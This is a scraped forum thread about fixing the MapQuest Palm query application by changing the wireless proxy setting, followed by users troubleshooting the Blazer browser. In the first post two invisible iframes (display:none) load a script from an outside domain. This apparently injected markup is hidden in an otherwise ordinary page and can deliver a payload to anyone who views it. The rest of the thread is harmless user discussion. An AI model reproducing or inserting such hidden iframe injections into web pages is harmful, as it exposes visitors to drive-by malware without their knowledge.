+ Reply to Thread

Map Quest PQA fix

For anyone who may have tried to download & run the Map Quest PQA, you most likely experienced the same results as I did ... it didn't work. After asking them what the problem might be, I was sent a "fix" by the kind tech support folks at Map Quest. Here it is:

Under "Prefs", "Wireless", change the proxy address to:

That's it! I've had no other problems with Map Quest or with any other app. I had been running.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

what version of mapblast are you using?

I downloaded it from mapblast, but I do not get the maps and the traffic information says it's out of date and to download the new version.

I am wondering... do you have the map and traffic feature working on your device? Do you think they were having too many problems with their software.. and went back to the previous version?

If you have a copy of the new version of mapblast... can you post it somewhere or e-mail it to me?

Thanks,

Russ

Can't E-mail, you have it turned off!!

Can't E-mail, you have it turned off!! Check your profile!!

Originally posted by russdog
    what version of mapblast are you using?

I downloaded it from mapblast, but I do not get the maps and the traffic information says it's out of date and to download the new version.

I am wondering... do you have the map and traffic feature working on your device? Do you think they were having too many problems with their software.. and went back to the previous version?

If you have a copy of the new version of mapblast... can you post it somewhere or e-mail it to me?

Thanks,

Russ

I chenged it. Thanks!

russellwray@hotmail.com

Thanks!

MapQuest PQA

It's here--I hope

Thanks,

Russ [/B][/QUOTE]
    Attached Files

Re: Map Quest PQA fix

Originally posted by fgkay
    For anyone who may have tried to download & run the Map Quest PQA, you most likely experienced the same results as I did ... it didn't work. After asking them what the problem might be, I was sent a "fix" by the kind tech support folks at Map Quest. Here it is:

Under "Prefs", "Wireless", change the proxy address to:

That's it! I've had no other problems with Map Quest or with any other app. I had been running.
    Since I've done this, I cannot make a connection using Blazer. "MyPalm" works, email works, just not Blazer. Any suggestions? I don't know if I kept the old settings before I made these changes.

Many thanks.

Craig

Administrator

Arrow

when you say it doesnt work, do you see the sprint pcs conecting page come up? if so, how far does it go thru the protocols before nothing happens? do you get an eror mesage? ppp/timeout message?

Originally posted by Marctronixx
    when you say it doesnt work, do you see the sprint pcs conecting page come up? if so, how far does it go thru the protocols before nothing happens? do you get an eror mesage? ppp/timeout message?
    Excellent questions!!

I do see the "connecting" screen, and I am able to connect, but I get the following error message:

The page cannot be loaded because the connection was lost or could not be established. Check networking settings, and make sure coverage is available if using a wireless device.

I click OK, get the same error message, click OK again, and then get a blank Blazer window. The connection icon is there, and I am able to use the connection with other aps, so it appears to me at least to be a Blazer problem. Again, the problem didn't arise until I changed the address (IP?) using the instructions above relating to Map Quest. Frankly, I could remove Map Quest and restore the previous settings, althought obviously I would like them all to work, and additionally, I don't think I kept a record of the previous address.

Thanks for you help.

Craig

I just located the previous settings (I did write them down!). They were:

Are there perhaps other settings that may allow all to get along nicely?

Thanks again.

Addendum

I just changed back to the default, factory settings, and got the same response (error messages) so obviously the next step is to re-install Blazer, which I will do now.

Stay tuned....

Addendum

I just changed back to the default, factory settings, and got the same response (error messages) so obviously the next step is to re-install Blazer, which I will do now.

Stay tuned....

Re: Addendum

Originally posted by csherman

Stay tuned....
    Okay, all fixed, even with new settings. Thanks marctronix!

Question

I'm seriously confused on this topic.

I downloaded the Mapquest.pqa file from Mapquest.com .

Are we talking about mapblast or mapquest on this thread? Where do I download the mapbplast pqa? The mapquest pqa seems to work for me but with the exception of an info. message saying I don't have the latest version.

TIA,

Sam

Administrator

Arrow Re: Re: Addendum

Originally posted by csherman

Okay, all fixed, even with new settings. Thanks marctronix!
    u DA man CS!!!

OK. I figured it out. I needed to change my wireless setting in preferences AND download the new mapquest_pqa.pdb file provided in another post.

Sorry for the confusion.

Sam

Sam,
    They are talking about mapquest. The flavor of mapquest_pqa.pdb that you get form the mapquest site says has buttons for maps, directions and traffic. If you change the IP address as discussed in this thread, all three functions will work correctly with no error message. Mapquest says that they are working on a version that does not require this change and will release it soon.

Adam

PS: In case you are not sure which version to load, I'm attaching a copy.
    Attached Files